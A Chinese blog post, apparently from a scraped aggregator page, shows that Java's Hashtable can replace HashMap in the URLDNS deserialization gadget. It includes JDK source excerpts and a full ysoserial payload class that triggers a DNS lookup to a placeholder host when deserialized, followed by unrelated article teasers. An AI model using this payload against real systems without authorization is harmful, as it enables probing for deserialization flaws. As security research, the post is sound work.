ph4nt0mer
ph4nt0mer

【鸡肋】URLDNS2的反序列化发现

今天在公司分析cve-2020-2551漏洞的时候,发现了一个新的类,叫hashtable。

【鸡肋】URLDNS2的反序列化发现_第1张图片

 

看了下,实现了Serializable的接口,说明这个类是可以序列化的。符合pop链的条件之一。

接下来看下hashtable的readobject方法:

 1 private void readObject(java.io.ObjectInputStream s)
 2          throws IOException, ClassNotFoundException
 3     {
 4         // Read in the threshold and loadFactor
 5         s.defaultReadObject();
 6 
 7         // Validate loadFactor (ignore threshold - it will be re-computed)
 8         if (loadFactor <= 0 || Float.isNaN(loadFactor))
 9             throw new StreamCorruptedException("Illegal Load: " + loadFactor);
10 
11         // Read the original length of the array and number of elements
12         int origlength = s.readInt();
13         int elements = s.readInt();
14 
15         // Validate # of elements
16         if (elements < 0)
17             throw new StreamCorruptedException("Illegal # of Elements: " + elements);
18 
19         // Clamp original length to be more than elements / loadFactor
20         // (this is the invariant enforced with auto-growth)
21         origlength = Math.max(origlength, (int)(elements / loadFactor) + 1);
22 
23         // Compute new length with a bit of room 5% + 3 to grow but
24         // no larger than the clamped original length.  Make the length
25         // odd if it's large enough, this helps distribute the entries.
26         // Guard against the length ending up zero, that's not valid.
27         int length = (int)((elements + elements / 20) / loadFactor) + 3;
28         if (length > elements && (length & 1) == 0)
29             length--;
30         length = Math.min(length, origlength);
31 
32         if (length < 0) { // overflow
33             length = origlength;
34         }
35 
36         // Check Map.Entry[].class since it's the nearest public type to
37         // what we're actually creating.
38         SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, length);
39         table = new Entry[length];
40         threshold = (int)Math.min(length * loadFactor, MAX_ARRAY_SIZE + 1);
41         count = 0;
42 
43         // Read the number of elements and then all the key/value objects
44         for (; elements > 0; elements--) {
45             @SuppressWarnings("unchecked")
46                 K key = (K)s.readObject();
47             @SuppressWarnings("unchecked")
48                 V value = (V)s.readObject();
49             // sync is eliminated for performance
50             reconstitutionPut(table, key, value);
51         }
52     }

 

和hashmap很像,实际上hashmap和hashtable作用真的很像,导致他们的代码内部也很像。根据hashmap的经验,去追了一下reconstitutionPut方法,

 1     private void reconstitutionPut(Entry[] tab, K key, V value)
 2         throws StreamCorruptedException
 3     {
 4         if (value == null) {
 5             throw new java.io.StreamCorruptedException();
 6         }
 7         // Makes sure the key is not already in the hashtable.
 8         // This should not happen in deserialized version.
 9         int hash = key.hashCode();
10         int index = (hash & 0x7FFFFFFF) % tab.length;
11         for (Entry e = tab[index] ; e != null ; e = e.next) {
12             if ((e.hash == hash) && e.key.equals(key)) {
13                 throw new java.io.StreamCorruptedException();
14             }
15         }
16         // Creates the new entry.
17         @SuppressWarnings("unchecked")
18             Entry e = (Entry)tab[index];
19         tab[index] = new Entry<>(hash, key, value, e);
20         count++;
21     }

发现了int hash = key.hashCode();说明hashtable下面的key也是会进行hashCode()的操作,和hashmap的URLDNS链异曲同工,那么就简单了,URLDNS2的改写就很简单,直接把hashmap类改成hashtable即可。

源码如下:

 1 package ysoserial.payloads;
 2 
 3 import ysoserial.payloads.annotation.Authors;
 4 import ysoserial.payloads.annotation.Dependencies;
 5 import ysoserial.payloads.annotation.PayloadTest;
 6 import ysoserial.payloads.util.PayloadRunner;
 7 import ysoserial.payloads.util.Reflections;
 8 
 9 import java.io.IOException;
10 import java.net.InetAddress;
11 import java.net.URL;
12 import java.net.URLConnection;
13 import java.net.URLStreamHandler;
14 import java.util.Hashtable;
15 
16 @SuppressWarnings({ "rawtypes", "unchecked" })
17 @PayloadTest(skip = "true")
18 @Dependencies()
19 @Authors({ Authors.GEBL })
20 public class URLNDS2 implements ObjectPayload {
21     @Override
22     public Object getObject( final String url1) throws Exception {
23         String url = "https://3.s.xxx.com";
24         //Avoid DNS resolution during payload creation
25         //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
26         URLStreamHandler handler = new URLDNS.SilentURLStreamHandler();
27 
28         Hashtable ht = new Hashtable(); // HashMap that will contain the URL
29         URL u = new URL(null, url, handler); // URL to use as the Key
30         ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
31 
32         Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
33 
34         return ht;
35     }
36 
37     public static void main(final String[] args) throws Exception {
38         PayloadRunner.run(URLNDS2.class, args);
39     }
40 
41     /**
42      * 
This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
43      * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
44      * using the serialized object.

45      *
46      * Potential false negative:
47      * 
If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
48      * second resolution.

49      */
50     static class SilentURLStreamHandler extends URLStreamHandler {
51         protected URLConnection openConnection(URL u) throws IOException {
52             return null;
53         }
54 
55         protected synchronized InetAddress getHostAddress(URL u) {
56             return null;
57         }
58     }
59 } 
  
 
 
 
 
URL实例还是作为触发hashtable的hashCode存在。
 
 
run 跑一下:
 
 
成功收到dns记录。
 
 
 
 
 
【鸡肋】URLDNS2的反序列化发现_第2张图片
 
 
 
 

                            
                        
                    
                    
                    

                    
                    
                    

                
                

                    
                

            
        
    
    

        
你可能感兴趣的:(【鸡肋】URLDNS2的反序列化发现)

        

            

                
    
                    
  • Fastdfs-V5.11使用docker部署集群(X86)
                        礁之
Linux系列dfsjavadocker
                        
    文章目录一、Fastdfs介绍二、部署信息三、步骤tracker/storage机器的compose内容storage机器的composetracker与storage启动目录层级与配置文件client.confstorage.conf查看集群信息测试测试集群扩容与缩减nginx配置一、Fastdfs介绍FastDFS是一款高性能的分布式文件系统,特别适合用于存储和管理大量的文件二、部署信息使用d
    
                    
    • 
                    
  • 基于Python拉取tiktok直播视频流,并将视频流切割成一定时长的视频片段
                        sh_moranliunian
蜘蛛侠网络爬虫后端python爬虫
                        
    通过访问tiktok的直播间网页,从网页的script标签内部提取出关于该直播间的相关信息的JSON串,最终从JSON里提取出直播视频流的hls地址和直播间的其他信息。importsysimportrequestsimportjsonimporttimeimportsubprocessfromurllib.parseimporturlunparsefrombs4importBeautifulSou
    
                    
    • 
                    
  • 高级java每日一道面试题-2025年3月03日-微服务篇[Eureka篇]-Eureka自我保护机制是什么?
                        java我跟你拼了
java每日一道面试题java微服务eurekaSpringCloudSpringBoot自我保护机制出发条件
                        
    如果有遗漏,评论区告诉我进行补充面试官:Eureka自我保护机制是什么?我回答:在Java高级面试中,Eureka的自我保护机制(Self-PreservationMode)是一个非常重要且常被提及的话题。理解这一机制的工作原理及其应用场景对于构建高可用性的微服务架构至关重要。以下是结合提供的内容对Eureka自我保护机制的详细解析和综合概述:自我保护机制的概念Eureka的自我保护机制是一种容错
    
                    
    • 
                    
  • uniapp中使用webview并与原页面通信
                        数学分析分析什么?
uni-app
                        
    uniapp中使用webview并与原页面通信1.接收数据主要使用@message与@onPostMessage接收原页面数据,且两个方法只能在APP中使用,其他平台均不支持。/***接收页面返回参数*@param{Object}item*/htmlMessage(item){console.log('收到的消息',item)letdata=item.detail...},2.发送数据(调用原页面
    
                    
    • 
                    
  • JVM技术八股文
                        小麟School
JVMjvmjava开发语言
                        
    JVM面试八股文,整理了出来。排版不太好!目录JVM入门部分为什么要学习JVM?你了解哪些JVM产品?JVM的构成有哪几部分?JVM类加载部分你知道哪些类加载器?为什么需要多个类加载器?什么是双亲委派类加载模型?双亲委派方式加载类有什么优势、劣势?描述一下类加载时候的基本步骤是怎样的?什么情况下会触发类的加载?类加载时静态代码块一定会执行吗?如何理解类的主动加载和被动加载?为什么要自己定义类加载器
    
                    
    • 
                    
  • `fetch` 和 `axios`的前端使用区别
                        Studying_swz
blog前端
                        
    欢迎访问的个人博客:https://swzbk.site/,加好友,拉你入福利群fetch和axios`是前端常用的两种HTTP客户端,以下是它们的核心区别及适用场景:一、本质区别特性fetchaxios类型浏览器原生API(部分环境需polyfill)第三方库(需通过npm/yarn安装)底层实现基于Promise基于Promise,封装了XMLHttpRequest二、核心功能对比1.请求与响
    
                    
    • 
                    
  • 如何轻松爬取 TikTok 评论?手把手教你高效采集数据!
                        pzhyy
大数据数据分析数据挖掘内容运营新媒体运营
                        
    引言随着TikTok的全球火爆,越来越多的数据分析师、营销人员和研究人员希望获取TikTok视频评论,以分析用户反馈、市场趋势或热门内容。然而,手动整理TikTok评论既耗时又低效,因此,使用一款高效的TikTok采集器成为刚需。Tapicker是一款功能强大的TikTok采集软件,可以帮助用户自动爬取TikTok评论,省去繁琐的手工整理工作。本文将详细介绍如何使用Tapicker爬取TikTok
    
                    
    • 
                    
  • thinkphp5模型查询数据库,查出来的字段直接修改成另外的名字
                        知码客
个人随笔thinkphp5php开发
                        
    在ThinkPHP5中,如果你希望在查询数据库时将返回的字段名直接修改为其他名称,可以通过以下几种方式实现:方法1:使用field方法指定字段别名在查询时通过field方法直接为字段指定别名(使用AS关键字)。示例代码://使用Db类查询$result=Db::name('user')->field('idASuser_id,nameASfull_name')->select();//使用模型查询
    
                    
    • 
                    
  • 史上最全JVM面试八股文合集
                        Java小海.
面试java职场和发展程序人生后端
                        
    简述JVM内存模型线程私有的运行时数据区:程序计数器、Java虚拟机栈、本地方法栈。线程共享的运行时数据区:Java堆、方法区。简述程序计数器程序计数器表示当前线程所执行的字节码的行号指示器。程序计数器不会产生StackOverflowError和OutOfMemoryError。简述虚拟机栈Java虚拟机栈用来描述Java方法执行的内存模型。线程创建时就会分配一个栈空间,线程结束后栈空间被回收。
    
                    
    • 
                    
  • [0482]基于JAVA的养老服务监控智慧管理系统的设计与实现
                        阿鑫学长【毕设工场】
java人工智能大数据毕业设计课程设计
                        
    毕业设计(论文)开题报告表姓名学院专业班级题目基于JAVA的养老服务监控智慧管理系统的设计与实现指导老师(一)选题的背景和意义选题背景与意义:随着全球社会老龄化的不断加剧,养老服务的信息化、智能化转型已成为必然趋势。我国作为世界上老年人口最多的国家,面临着巨大的养老压力和挑战,如何高效、科学地管理和优化养老服务资源,保障老年群体的生活质量及健康安全,是当前社会亟待解决的重要课题。基于此现实背景,设
    
                    
    • 
                    
  • 《基于图神经网络的安卓应用检测系统设计与实现》开题报告
                        大数据蟒行探索者
毕业论文/研究报告神经网络android人工智能机器学习大数据深度学习python
                        
    个人主页:@大数据蟒行探索者目录一、课题的研究目的和意义1.研究目的2.研究意义二、国内(外)研究现状及分析1.国内研究现状2.国外研究现状3.研究分析三、课题主要研究内容及可行性分析1.研究内容2.可行性分析四、研究方案和技术途径1.研究方案2.技术途径五、外部条件及解决办法1.开发环境2.解决办法六、主要参考文献一、课题的研究目的和意义1.研究目的随着智能手机的普及,安卓操作系统成为全球最为广
    
                    
    • 
                    
  • 拉取镜像太慢?一文解决!
                        元子吖-
学习技巧docker部署docker镜像拉取
                        
    #拉取Docker镜像太慢?一文解决!在国内使用Docker拉取镜像时,可能会遇到速度慢甚至失败的情况。别担心!本文带你快速优化Docker拉取方法!01|确保DockerHub登录认证如果拉取的是私有镜像或API速率限制导致失败,可以先尝试登录:dockerlogin然后输入用户名和密码(或Token),这样可以避免因未认证而受限。02|替换国内镜像源由于DockerHub在国内访问较慢,可以使
    
                    
    • 
                    
  • uniapp报错 Right-hand side of ‘instanceof‘ is not an object
                        学无止境鸭
uni-app前端javascript
                        
    vue3使用vue2的插件组件时,会报这个错,原因是vue2组件内部的props接收属性时的type类型要写成[Srting,Number]数组的形式,而不是'String|Number'如图所示;
    
                    
    • 
                    
  • uniapp app权限说明弹框2024.5.23更新
                        风中凌乱的L
uniappuniapp
                        
    华为上架被拒绝用uni-app开发的app,上架华为被拒,问题如下:您的应用在运行时,未见向用户告知权限申请的目的,向用户索取(电话、相机、存储)等权限,不符合华为应用市场审核标准。测试步骤:任意招聘信息详情页-电话联系,申请电话权限;点击置顶推广-保存二维码到相册,申请存储权限;点击发布-任意服务-上传图片-拍摄/从相册选择,申请相机、存储权限;修改建议:APP在调用终端权限时,应同步告知用户申
    
                    
    • 
                    
  • 一文了解ThreadLocal
                        Key~美好的每一天
java开发语言
                        
    什么是ThreadLocal?ThreadLocal是每个线程私有的,线程可以把自己的私有数据放到ThreadLocal里面,不用担心其他线程访问到自己ThreadLocal。通过set()方法将值存入ThreadLocal或者修改值,get()方法取出值,remove()方法移除值。ThreadLocal原理ThreadLocal类中有一个内部类ThreadLocalMap,它其实就是一个哈希表
    
                    
    • 
                    
  • 华为云在工业数字化方面的优势
                        九河智造云
华为云人工智能云计算制造
                        
    华为云在工业数字化领域展现出全方位的优势,为制造业的转型升级提供了强大的助力。一、专业的数字化诊断治理服务华为云的数字化诊断治理专家服务为企业提供全面的深度诊断、成熟度评估、产业升级分析、创新治理和专家咨询等服务。其诊断模型参考国际国内标准,结合多体系理论与华为自身实践,能够精准定位企业运营中的问题点,并提供针对性的解决方案。同时,华为云拥有丰富的诊断团队和案例,基于全国180余个赋能云创新中心、
    
                    
    • 
                    
  • 使用 request 的 axios 状态码分析
                        fridayCodeFly
前端servlet
                        
    request.interceptors.response.use(function(response){},function(error){})后端返回结果code===400不经过response,直接跳到error。当后端返回状态码为400时直接进入error回调而不经过response回调,这是因为axios默认会将状态码不在200-299范围内的响应视为错误。解决1.修改validate
    
                    
    • 
                    
  • 计算机专业开题报告案例19: 基于spring boot的养老院信息管理系统的设计与实现
                        平姐设计
计算机毕业设计100套java项目实战网站开发与搭建实战项目springboot后端java计算机毕业设计养老院信息管理系统开题报告老人信息
                        
    计算机毕业设计100套微信小程序项目实战java项目实战需要源码可以滴滴我一、课题论证1.1国内外研究动态目前,基于springboot的养老院信息管理系统的研究和开发已经在国内外得到了较多关注和实践。北京大学医学部的研究人员开发了一套养老院信息管理系统,该系统可以实现对老人的生活、医疗、营养等方面的全面管理和监测。此外,南开大学、清华大学等高校也都开展了相关研究。其中就有采取建立于微信小程序平台
    
                    
    • 
                    
  • 【C++】仿函数的概念
                        无水先生
BOOSTC++c++
                        
    目录一、仿函数说明二、仿函数的定义三、更直观的例子四、仿函数实例五、仿函数仿函数(functor)在各编程语言中的应用5.1仿函数C5.2仿函数C++5.3仿函数C#5.4仿函数Java一、仿函数说明在我们写代码时有时会发现有些功能实现的代码,会不断的在不同的成员函数中用到,但是又不好将这些代码独立出来成为一个类的一个成员函数。但是又很想复用这些代码。写一个公共的函数,就要单立出一个函数,也不是很
    
                    
    • 
                    
  • C# 技术使用笔记:如何高效处理字符串
                        caifox菜狐狸
C#技术使用笔记c#笔记stringStringBuilderSubstringReplaceSplit
                        
    1.C#字符串基础概念1.1字符串不可变性在C#中,字符串具有不可变性,这意味着一旦创建了一个字符串对象,其内容就不能被修改。例如,当我们执行以下代码时:stringstr="Hello";str=str+"World";实际上,str+"World"并是修改了原来的"Hello"字符串,而是创建了一个全新的字符串对象"HelloWorld",并将str的引用指向了这个新对象,原来的"Hello"
    
                    
    • 
                    
  • uni-app全局弹窗的实现方案
                        -Dayer-
uni-app前端javascript全局弹窗
                        
    背景为了解决uni-app任意位置出现弹窗解决方案一、最初方案受限于uni-app调用组件需要每个页面都引入注册才可以使用,此方案繁琐,每个页面都要写侵入性比较强二、改进方案app端:新建一个页面进行跳转,可以实现伪弹窗(其实是打开一个背景透明的页面)web端:全局挂载body插入一个弹窗三、初步实现方案就是利用条件编译,web端写组件、app端写页面,利用不同的生命周期,完成通用的逻辑四、详细实
    
                    
    • 
                    
  • python中datetime模块
                        a1111111111ss
pythonpython
                        
    参考大佬cmzsteven双手奉上大佬的网址https://blog.csdn.net/cmzsteven/article/details/64906245datetime模块中包含如下类:2、通过year,month,day三个数据描述符可以进行访问:date对象由year年份、month月份及day日期三部分构成:date(year,month,day)>>>a=datetime.date.t
    
                    
    • 
                    
  • deepseek具体应用场景
                        ahyouxiang
人工智能
                        
    DeepSeek的具体应用场景非常广泛,涵盖了多个领域和行业。以下是基于证据的详细总结:金融领域DeepSeek在金融领域的应用表现突出,例如通过其大语言模型(如DeepSeekLLM67Bt)提供数学、逻辑推理等能力,帮助金融机构提升服务效率。此外,DeepSeek还被应用于智能安全体产品中,通过安全大模型实现个性化开发和优化。医疗领域在医疗领域,DeepSeek的技术被用于辅助诊断和患者记录管
    
                    
    • 
                    
  • 一键秒连WiFi智能设备,uni-app全栈式物联开发指南。
                        豆豆(前端开发+ui设计)
前端
                        
    如何使用uni-app框架实现通过WiFi连接设备并进行命令交互的硬件开发。为了方便理解和实践,我们将提供相应的源代码示例,帮助开发者快速上手。1.硬件准备在开始之前,请确保你已经准备好以下硬件设备:支持WiFi连接的设备:如ESP8266、ESP32等。控制端设备:手机或电脑,安装有支持uni-app开发的开发环境(如HBuilderX)。网络环境:确保设备和控制端在同一个局域网内。2.uni-
    
                    
    • 
                    
  • axios 请求拦截器和 响应拦截器总结
                        肉肉不吃 肉
前端vue.js服务器
                        
    请求拦截器和响应拦截器是axios提供的强大功能,用于在请求发送前和响应返回后统一处理某些逻辑。它们的作用和具体用法如下:1.请求拦截器作用在请求发送之前,对请求配置进行统一处理。例如:添加请求头(如Authorization)。修改请求参数。显示加载状态。用法通过axios.interceptors.request.use方法注册请求拦截器。示例instance.interceptors.req
    
                    
    • 
                    
  • AI 原生 IDE Trae 深度体验:SSHremote 功能如何重新定义远程开发与云原生部署
                        芯作者
DD:日记人工智能
                        
    一、引言:AI原生IDE的革新意义在AI技术全面渗透软件开发的今天,编程工具正从“辅助工具”向“智能协作伙伴”转变。字节跳动推出的Trae(国内首个AI原生IDE)以其独特的Builder模式、自然语言编程和SSHremote功能,不仅重新定义了开发流程,更将远程开发与云原生部署的效率提升至新高度。本文将从实际体验出发,深度解析Trae如何通过SSHremote功能实现“开发-调试-部署”全链路的
    
                    
    • 
                    
  • c++高性能多进程 cuda编程: safe_softmax实现 + cub::BlockReduce自定义归约操作
                        FakeOccupational
深度学习c++开发语言
                        
    目录cub::BlockReduce自定义归约操作(`cub::BlockReduce::Reduce`)1.语法safe_softmax实现cub::BlockReducecub::BlockReduce是CUB库(CUDAUnBound)提供的一种用于GPU线程块内数据归约(一般完成所有数据规约需要两次规约)的高效工具。它允许线程块内的多个线程并行地对数据执行归约操作,cub::BlockRe
    
                    
    • 
                    
  • 智慧城市道路防护栏破损缺陷检测数据集VOC+YOLO格式6939张3类别
                        FL1623863129
数据集YOLO深度学习机器学习
                        
    数据集格式:PascalVOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件)图片数量(jpg文件个数):6939标注数量(xml文件个数):6939标注数量(txt文件个数):6939标注类别数:3标注类别名称(注意yolo格式类别顺序不和这个对应,而以labels文件夹classes.txt为准):["body","cr
    
                    
    • 
                    
  • DeepSeek 大模型落地成都高新区:科技赋能警务的创新变革
                        AGI大模型学习
科技人工智能DeepSeek大模型chatgpt大模型应用AI大模型
                        
    在科技飞速发展的当下,人工智能正以前所未有的速度融入各个领域,深刻改变着人们的生活与工作方式。公安领域也不例外,积极拥抱科技创新,成为提升警务效能、维护社会稳定的关键路径。全国第一例警用DeepSeek大模型落地成都高新区,这一突破性举措在警务智能化发展进程中具有里程碑意义,为公安工作带来了全方位的革新。一、警用DeepSeek大模型落地的时代背景近年来,国产AI蓬勃发展,不断涌现出令人瞩目的成果
    
                    
    • 
                    
  • 如何合法抓取TikTok视频信息和评论:完整Python爬虫教程
                        Python爬虫项目
2025年爬虫实战项目音视频python爬虫开发语言
                        
    一、引言TikTok是全球最受欢迎的短视频平台之一,每天吸引着数百万的用户上传和分享视频内容。作为内容创作者和数据分析师,抓取TikTok上的视频和评论可以帮助你分析社交趋势、受欢迎的内容类型和用户互动。然而,TikTok明确表示其平台的数据抓取行为受到限制,这也意味着我们不能直接通过常规的网络爬虫技术去抓取其数据。本文将介绍如何在合法的前提下进行TikTok数据抓取。我们将探索TikTok的AP
    
                    
    • 
                                
  • java封装继承多态等
                                    麦田的设计者
javaeclipsejvmcencapsulatopn
                                    
           最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。 
    1、final关键字 
      译为:最终的 
       &
    
                                
    • 
                                
  • F5与集群的区别
                                    bijian1013
weblogic集群F5
                                    
            http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。 
        F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
    
                                
    • 
                                
  • LeetCode[Math] - #7 Reverse Integer
                                    Cwind
java题解MathLeetCodeAlgorithm
                                    
    原题链接:#7 Reverse Integer 
  
要求: 
按位反转输入的数字 
例1: 输入 x = 123, 返回 321 
例2: 输入 x = -123, 返回 -321 
  
难度:简单 
  
分析: 
对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
    
                                
    • 
                                
  • BufferedOutputStream
                                    周凡杨

                                    
         首先说一下这个大批量,是指有上千万的数据量。 
     例子: 
     有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中! 
     select t.msisd
    
                                
    • 
                                
  • linux下模拟按键输入和鼠标
                                    被触发
linux
                                    
    查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices 
设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。 
 
linux/in
    
                                
    • 
                                
  • ContentProvider初体验
                                    肆无忌惮_
ContentProvider
                                    
    ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。 
在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。 
如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
    
                                
    • 
                                
  • 关于Spring MVC项目(maven)中通过fileupload上传文件
                                    843977358
mybatisspring mvc修改头像上传文件upload
                                    
    Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。 
  
1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar 
因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定) 
<!-- 文件上传 start by zhangyd-c --&g
    
                                
    • 
                                
  • 使用svnkit api,纯java操作svn,实现svn提交,更新等操作
                                    aigo
svnkit
                                    
     原文:http://blog.csdn.net/hardwin/article/details/7963318 
  
import java.io.File;  
  
import org.apache.log4j.Logger;  
import org.tmatesoft.svn.core.SVNCommitInfo;  
import org.tmateso
    
                                
    • 
                                
  • 对比浏览器,casperjs,httpclient的Header信息
                                    alleni123
爬虫crawlerheader
                                    
    		@Override
		protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException
		{
			String type=req.getParameter("type");
			Enumeration es=re
    
                                
    • 
                                
  • java.io操作 DataInputStream和DataOutputStream基本数据流
                                    百合不是茶
java
                                    
    1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象  先将类实例化  后面的文章将详细写到 
  
  
2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
    
                                
    • 
                                
  • 车辆保险理赔案例
                                    bijian1013
车险
                                    
    理赔案例: 
一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。 
赔付建议和方案: 
客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”; 
如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
    
                                
    • 
                                
  • 学习Spring必学的Java基础知识(5)—注解
                                    bijian1013
javaspring
                                    
            文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。 
  
        有必要对
    
                                
    • 
                                
  • 【Struts2一】Struts2 Hello World
                                    bit1129
Hello world
                                    
    Struts2 Hello World应用的基本步骤 
创建Struts2的Hello World应用,包括如下几步: 
1.配置web.xml 
2.创建Action 
3.创建struts.xml,配置Action 
4.启动web server,通过浏览器访问 
  配置web.xml 
<?xml version="1.0" encoding="
    
                                
    • 
                                
  • 【Avro二】Avro RPC框架
                                    bit1129
rpc
                                    
    1. Avro RPC简介 1.1. RPC 
 
 RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包 
 从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
    
                                
    • 
                                
  • lua set get cookie
                                    ronin47
lua cookie
                                    
    lua:
local access_token = ngx.var.cookie_SGAccessToken
if access_token then
    ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000"
end
    
                                
    • 
                                
  • java-打印不大于N的质数
                                    bylijinnan
java
                                    
    

public class PrimeNumber {

	/**
	 * 寻找不大于N的质数
	 */
	public static void main(String[] args) {
		int n=100;
		PrimeNumber pn=new PrimeNumber();
		pn.printPrimeNumber(n);
		System.out.print
    
                                
    • 
                                
  • Spring源码学习-PropertyPlaceholderHelper
                                    bylijinnan
javaspring
                                    
    今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug 
当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复: 
详见: 
http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug 
 

    
                                
    • 
                                
  • [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么?
                                    comsci
拓扑
                                    
     
   如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢? 
 
   是否可以形成一种新的模糊语言识别和处理模型呢?  大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
    
                                
    • 
                                
  • ITEYE 都换百度推广了
                                    cuisuqiang
GoogleAdSense百度推广广告外快
                                    
    以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。 
  
为什么个人博客设置里面还是Google AdSense呢? 
  
都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。 
  
什么时候能从ITEYE上来点外快,哪怕少点
    
                                
    • 
                                
  • 新浪微博技术架构分析
                                    dalan_123
新浪微博架构
                                    
    新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
    
                                
    • 
                                
  • 玩转ARP攻击
                                    dcj3sjt126com
r
                                    
    我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
    
                                
    • 
                                
  • PHP编码规范
                                    dcj3sjt126com
编码规范
                                    
    一、文件格式 
1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
    
                                
    • 
                                
  • linux 脱机管理(nohup)
                                    eksliang
linux nohupnohup
                                    
    脱机管理 nohup 
转载请出自出处:http://eksliang.iteye.com/blog/2166699 
nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下 
nohup [命令与参数]   --在终端机前台工作
nohup [命令与参数] & --在终端机后台工作 
  
但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
    
                                
    • 
                                
  • BusinessObjects Enterprise Java SDK
                                    greemranqq
javaBOSAPCrystal Reports
                                    
    最近项目用到oracle_ADF  从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。 
  
首先,我是尝试用JAVA JSP 去访问的。 
  
官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
    
                                
    • 
                                
  • 系统负载剧变下的管控策略
                                    iamzhongyong
高并发
                                    
    假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。 
1、水平扩展 
这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。 
2、系统分组 
假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
    
                                
    • 
                                
  • BitTorrent DHT 协议中文翻译
                                    justjavac
bit
                                    
    前言 
做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。 
 
